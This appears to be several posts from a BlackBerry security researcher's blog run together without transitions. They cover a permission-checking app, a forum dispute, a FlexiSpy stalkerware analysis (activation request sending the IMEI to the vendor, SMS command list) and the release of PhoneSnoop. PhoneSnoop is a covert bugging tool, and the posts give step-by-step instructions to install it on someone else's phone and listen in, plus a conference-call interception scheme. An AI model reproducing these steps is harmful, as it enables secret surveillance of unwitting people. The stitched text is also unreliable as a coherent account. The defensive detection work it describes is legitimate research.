1. You don’t know if your “Input Simulation” permission is set to “Allow”.  If it is allowed, any application can make key-presses on your handheld as if they were you.  Potential: an application can answer your phone calls.
2. You’re not sure your “Security Timer Reset” permission is set to “Allow”.  If it is, then any application can render your screen lockout useless.

I can almost hear you asking me, “Why tell me about it? You think I don’t know about this?” and the truth is, its an even split.  There are users out there that are blissfully unaware of things like Default Application Permissions.  The BlackBerry is going the way of the consumer, and fast.  With the rise in popularity of the BlackBerry Internet Service, a user no longer needs to be a part of an large organization to reap the many benefits of a BlackBerry.  The flip side?  There is no enterprise security administrator or policy to protect these users.  Thus when they decide to go with BIS, they take on the task of remaining secure.  For a second, leave these users out of the picture.  Pick the other half of the users who are aware.  Suppose they set some permissions and then forgot about them?  Maybe they allowed access based on an application requesting them to do so and they never set the permissions back.  What then?

I thought about this and came up with a solution of sorts.  Why not have a list of the most important security permissions and check them at a timed interval to see if they have been changed?  If they have, then send the user an alert.  Here’s the code I came up with:

package com.zensay.sectest;

import java.util.Timer;
import java.util.TimerTask;
import net.rim.device.api.applicationcontrol.ApplicationPermissions;
import net.rim.device.api.applicationcontrol.ApplicationPermissionsManager;
import net.rim.device.api.system.Application;
import net.rim.device.api.system.Bitmap;
import net.rim.device.api.ui.Manager;
import net.rim.device.api.ui.Screen;
import net.rim.device.api.ui.Ui;
import net.rim.device.api.ui.UiEngine;
import net.rim.device.api.ui.component.Dialog;

public class Main extends Application
{
    public static void main(String args[])
    {
        Main app = new Main();
        app.enterEventDispatcher();
    }

    public Main()
    {
        TimerTask tm = new TimerTask()
        {
			public void run()
			{
				reqPerm();
			}
        };
    	Timer t = new Timer();
        t.schedule(tm,10000, 10000);
    }

    public void reqPerm()
	{
		ApplicationPermissionsManager apm = ApplicationPermissionsManager.getInstance();
		int input = apm.getPermission(ApplicationPermissions.PERMISSION_INPUT_SIMULATION);
		if(input == ApplicationPermissions.VALUE_ALLOW)
		{
			synchronized(Application.getEventLock())
			{
				UiEngine ui = Ui.getUiEngine();
				Screen screen = new Dialog(Dialog.D_OK, "Input Simulation is allowed!!",
						Dialog.OK, Bitmap.getPredefinedBitmap(Bitmap.EXCLAMATION), Manager.VERTICAL_SCROLL);
				ui.pushGlobalScreen(screen, 1, UiEngine.GLOBAL_QUEUE);
			}
		}
	}
}

To explain it a little bit, the code (when compiled, signed and executed on your BlackBerry) will check your “Input Simulation” permission.  If it is set to “Allow” the application will pop open a message window and notify the user.  It does this every 10 seconds.  Its annoying as hell, but I think you get the general idea.  I tested this on my Bold and it works very well.  I’m thinking about making it an additional feature in Kisses; with a slightly longer timeout of course.  Its a feature I would find useful.

The thread demonstrates some of the ways in which people formulate opinions and it highlighted something very important; to me at least.  Its a trait that I have seen with so many developers of applications as well.  It would appear to me that people are always looking to “play” within a certain set of distinct boundaries.

I’ll give you an example of a web application developer.  In one banking application I tested, I was able to do a “negative transfer”.  It worked like this, if Alice were to transfer -$1000 to Bob, the logic of the application made Bob do a transfer of $1000 to Alice.  So by Alice initiating a negative transfer, she was able to pull money out of Bob’s account.  When confronted with this, the developer simply stated “yes, but a user is not supposed to do this.”  Well of course he’s not supposed to do this, but isn’t it your job as a developer to check for it?  An attacker is not going to play nice; he’s going to find any way he can to own you.  If he can’t hack your systems, he’ll come at you with a knife or a gun.  To him, the end goal is getting what he wants.  He’s not going to stop doing something just because “a user is not supposed to do this”.

If you take the case of what happened in the forums above, it seems very similar.  Here goes:

The forum users and moderators that did reply, seem to be under the impression that just because I released PhoneSnoop, I am trying to infect them by pushing Kisses (in their minds a malicious app) as a cure.  So to me, at least, it appears that their “boundary” or “sandbox” is the fact that I should have released one or the other but not both.  I’ll cover why this is not a very sound way of thinking later, but first, some fun.  Here are some of the things said in the forum post if you didn’t bother reading the whole thing.

• I was asked if now that I had raised awareness how long I will make PhoneSnoop available for.
• I was compared to a fox guarding a hen house
• I was compared to a pharmaceutical company
• I was wished with “Kisses of death”
• I was threatened with being sent back to Sri Lanka in a box.
• I was called a lovely set of names ranging from “super-spy”, “spy-master” and compared with mid-eastern terrorists
• I asked for donations to help get my hands of copies of FlexiSpy and MobileSpy (mostly because I was writing Kisses for free and was not in a position to pay over $200 for them) and thanks to some members of the phone community out there, I was able to get my hands on copies.  I was questioned as to why I asked for donations and they stated that even free anti-virus product companies don’t ask for donations.
• One of them thinks my Kim Jong Il avatar (taken from Team America; very apt in this case I must say ) on my twitter page makes me look very shady.

So I now am going to dub these wonderful people who are protectors of the BlackBerry community as Team BlackBerryForums.

I have to admit, though, that I respect them very much.  The are very dedicated and I hope that most of what they say comes from some place inside them where they want to protect other users.  For this, yes, I have to bow down and say that I’m impressed.

Right, now onto the reason why this sort of behavior is not very helpful.  First, I really don’t care if users don’t download and use my Kisses application.  I put it up there, because I wanted to give something back to users for free to help them protect themselves.  This was my only intention.

By making it appear to other users that I am evil because I wrote PhoneSnoop and now I’m writing Kisses, Team BlackBerryForums are not being helpful to their users.  Its like in Green Eggs and Ham – a pre-conceived notion before investigating things further. It would have been far more helpful to their users if they had verified things first before seemingly writing off the app as spyware.  To their credit, however, they did ask a lot of questions.  CrackBerry Forums just shut down the thread.  If they had researched what I presented in the Hack In The Box security conference, they would known that there are far more creative ways of infecting BlackBerry users.  I tried to stress this point in my replies, but I guess their minds were already made up.

Lets hypothetically take the situation where I am someone evil and my only job is to spy on BlackBerry users.  I think I would have a far better chance of being stealthy.  I would certainly not highlight the fact that I can bug peoples phones and I surely would not release a proof-of-concept application.  This removes the element of stealth from my plan.  This is how I would do it, again, hypothetically.

I think Team BlackBerryForums believes that by releasing a proof-of-concept tool makes me a terrorist of sorts.  They seem to think that nothing I do from now on can be trusted and is not well-intentioned.  Now I can see how they would think that.  But surely, they should be aware that if I had a serious need to read people’s email or tap their phone calls, I would find a way to do it?  And do it quietly?

Looking at my latest log file, I have 489 distinct downloads of Kisses.  I have had numerous emails from people asking me to support older versions of their BlackBerries and I have had lots of emails thanking me for releasing the free app.  I’m very happy that some people out there perceive the app as useful.  I think that’s enough for me.  So for the sake of those people out there, I will continue to develop Kisses and release it.  A big thanks go out to you guys.

Knowing the APIs of the BlackBerry, I can confirm that this will work only if and when a target has conference calling enabled.  The theory is simple again.  The application hooks the “callConnected” method on the PhoneListener class.  Then when it detects a specific number that has been specified, it sends an SMS to a pre-defined number.  Once that same pre-defined number calls in during an active call, the phone automatically answers and adds the user into a three-way conference.  So its dependent on the target and his phone plan.  Thus this feature is not a guaranteed one.  One thing I plan to try out is to see if the target will actually hear the call-waiting tone before the third call is connected.  Here’s a graphic that explains how it works:

Bob calls Alice on her bugged phone

Alice's phone sends an SMS to Charlie

Charlie calls Alice's phone & is added to the conversation

In the scene above, Bob is a friend who calls Alice.  Alice has had her phone bugged by Charlie.  Charlie wants to listen into conversations between Bob and Alice.  For this to work, Alice needs to have the ability to make conference calls.  This is typically a value-added service from the mobile network operator.  Thus this attack is dependent on Alice having subscribed to such services.

Like all the other things, I’ve written about, I need to conduct some more research on it.  I’ve been busy these days with the day job and my research is taking a back seat.  Sad really.  Maybe its time to look for a job that pays me to do this stuff??  If you want the tool that lets you test out how you can remotely listen in on ambient noise and conversations, look here.

Once a buyer parts with his $300, he will receive a user manual that provides information on how the application can be installed on a target’s phone.  I examined the version for the BlackBerry.  When going through the user manual, one of the first things that jumped out at me was this: explicit instructions to set the Default Permissions of the BlackBerry handheld to Allow All. This means that not just FlexiSpy, but every single application the target installs on his phone after this can gain full control (within the scope of the programming interface or API) over his handheld.  Obviously user protection is not a high priority in this case.

At this point, I haven’t installed the app yet.  I begin to do so.  By using the phone’s built-in browser, I am asked to visit the site http://djp.cc.  I need to enter my activation key here and then I am presented with a download dialog.  This download dialog is simply a JAD file.  The contents of which are listed below:

Manifest-Version: 1.0
MIDlet-Version: 3.02.04
MIDlet-Jar-Size: 232073
RIM-COD-URL-2: net_rim_app_console_pro-2.cod
MicroEdition-Configuration: CLDC-1.1
MIDlet-Jar-URL: net_rim_app_console_pro.jar
RIM-COD-Module-Dependencies: net_rim_cldc,net_rim_bbapi_mailv2,net_rim_os,net_rim_bbapi_phone,
net_rim_locationapi
RIM-COD-SHA1-2: 49 d9 a2 9c 2e 55 c2 fc da b4 2d 96 01 67 ef 7a 89 26 25 ac
RIM-COD-URL-1: net_rim_app_console_pro-1.cod
RIM-COD-SHA1-1: ab 26 1a 63 7c e9 e4 83 bc 04 2b 69 22 c7 54 5b 73 02 13 ce
RIM-COD-Size-2: 31304
RIM-COD-Size-1: 87268
RIM-COD-Module-Name: net_rim_app_console_pro
MIDlet-Name: net_rim_app_console_pro
RIM-COD-Size: 78756
RIM-COD-Creation-Time: 1246442605
RIM-COD-URL: net_rim_app_console_pro.cod
RIM-Library-Flags: 3
RIM-COD-SHA1: c9 33 b8 05 92 d8 08 e0 03 a6 21 e3 56 e7 70 0a f8 42 63 b5
MicroEdition-Profile: MIDP-2.0
MIDlet-Vendor: <unknown>

This tells a BlackBerry where to go to get the actual binary or COD file.  In this case its http://djp.cc/net_rim_app_console_pro.cod and http://djp.cc/net_rim_app_console_pro-1.cod.  Generally, if a COD file exceeds size limitations or consists of several pre-compile external libraries, there will be a need to download more than 1 file.  This is interesting because the first thing I did after installing it is look for it in my Applications screen.  It turns out that FlexiSpy is never hidden on your BlackBerry.  It remains in plain sight, but with an obscure name that looks very similar to a RIM native library.  The application is also tagged as a library.

How FlexiSpy looks when installed

FlexiSpy is installed as a library

So there it is, if you want to look for the latest version of FlexiSpy on your BlackBerries, go to Options->Advanced Options->Applications and look for “net_rim_app_console_pro“.  One thing very interesting is that if something is marked as a Library, in theory at least, you should be able to access some of the classes and methods within.  Curious, I did a “strings” on each of the COD files.  True enough, there was a list of package names, classes and methods visible – at least their names.  Since I’ve given out the URL, I’ll leave this exercise up to the reader.  I will explore possibilities of how this can be done and if indeed other applications can make use of FlexiSpy’s libraries.

Behavior

FlexiSpy requires activation before it can begin to spy on a target.  To do this, a user has to dial the number *#900900900 and then a hidden screen is activated.  On this screen, a user is prompted to enter the activation code.  Never one to leave home without my Wireshark, I sniffed the traffic that went through during the activation process.  Here is the information that went across the wire:

POST /t4l-mcli/cmd/productactivate?mode=0&ver=0302&pid=FSP_BB_V4.2&actcode=[Activation Code]
&hash=[IMEI]&phmodel=8300(4.5.0.44) HTTP/1.1

This request is made to a server with second level domain “aabackup.info” It resolves to the same IP Address as the host djp.cc listed above.  As you can see, the phone’s IMEI is being sent back to FlexiSpy HQ.  Also visible is the Activation Code.  What is returned is a hash value which I didn’t look into very closely yet.  Presumably the phone calculates a similar algorithm and waits for a matching hash.  Once the correct hash is received the app is activated.

From this point out, its a case of configuring the application to intercept SMS messages, email messages, call logs, etc.  The application has a command channel through SMS.  Thus, you have a list of about 8 commands which do the following:

• Start Capture – Begin capturing events like email, sms, location, etc
• Stop Capture – Stop an already started capture
• Send Immediate – Send all collected events to the central logging host
• Send Diagnostics – Send diagnostic info
• Start SIM Monitor – Watch for any attempt at changing the SIM
• Stop SIM Monitor – Stop
• Start Mic Monitor – Wait for calls from a trigger number
• Stop Mic Monitor – Stop

The funny thing is that the command channel SMS messages cannot be deleted, so the manual advises a user to select short phrases like “Good morning” or some such to begin capturing information.  The phrases should be chosen so as not to arouse the target’s suspicion.

Detection

FlexiSpy relies very heavily on Listeners.  Even to bring up its secret screen, it adds a PhoneListener to wait for a specific number to be dialed.  This ensures that no running applications exist on the phone.  It uses these built-in features of the BlackBerry to remain cloaked.  It sits in plain sight in your applications directory and FlexiSpy can choose to constantly change its name whenever they release a new version.  I am incorporating the detection of both FlexiSpy and Mobile-Spy in my Kisses app.  I have a few ideas on how I can write a one time detector for FlexiSpy and Mobile-Spy.  The theories are on the drawing board at the moment.  I have to find a way to bring it into the code.

I expect to do a much more detailed write up on both FlexiSpy and Mobile-Spy and a much needed paper on what BlackBerry users can do to protect themselves.

Acknowledgments

Special thanks go out to Spyphoneguy for all his help!

I promised everyone at the conference that I’d have a working application that can spy on the audio of other users who own a BlackBerry.  I am ready to deliver on that promise today.  This post is a prelude to the release of the tool.  I’ve so far not packaged it with Bugs.  Its a separate program that I named PhoneSnoop.  Please note that PhoneSnoop is not an application that does Phone Taps or give you the ability to listen into phone calls.  It can be done, however, and you can read more on that how to tap calls here.  I’d like to have some volunteer beta testers  to see how well the application works You can now download PhoneSnoop directly from here by using your BlackBerry (be sure to read the guide and also make sure to set your input language to English US for the app to work correctly).  You will be able to configure your own phone number.  If you’re interested, please mail me on zen.chopstick@gmail.com For the chickens out there, here’s a video of the app in action (I’ve not got audio on it, but it has closed captioning so make sure you turn it on).  I’m working on a video that shows the app on a real handheld with commentary, but for now, make do with this :p

PhoneSnoop – BlackBerry Bugging Application

Here’s how it works:

You install and run PhoneSnoop on a victims’ BlackBerry.  PhoneSnoop sets up a PhoneListener and waits for an incoming call from a specific number.  Once it detects a call from that specific number, it automatically answers the victims’ phone and puts the phone into SpeakerPhone mode.  This way, the attacker that called can now hear whats going on at the victims end.  Pretty simple right?  In the video above, I have setup PhoneSnoop to listen in for calls originating from +12120031337.  I first make a call from +12120031336 to show that there’s no effect.  Then, I show what happens when a call is made from the expected number.  The demo is on the BlackBerry simulator for now, but I’m working on bringing you a video that demonstrates the application on a real BlackBerry Bold.

Installation Instructions:

1. Grab your friend’s BlackBerry
2. Download PhoneSnoop from the URL I mail you
3. Once installed, go to Options->Advanced Options->Applications->PhoneSnoop->Edit Permissions and change the “Input Simulation/Event Injection” to “Allow”
4. Run PhoneSnoop

Checking the bugging capabilities:

1. Call the victims phone number
2. Listen

I will need to give you a customized version of PhoneSnoop hence there’s no download.  If you’re interested in trying it, mail me at zen.chopstick@gmail.com.  Include your phone number so that I can code it into the application.  I’m not doing a general release at the moment because of the implications of this tool.  I’m mainly looking for feedback so that I can refine the tool and write a paper on it. The tool is now available for general release.  Anyone can download it.  Go here to read more.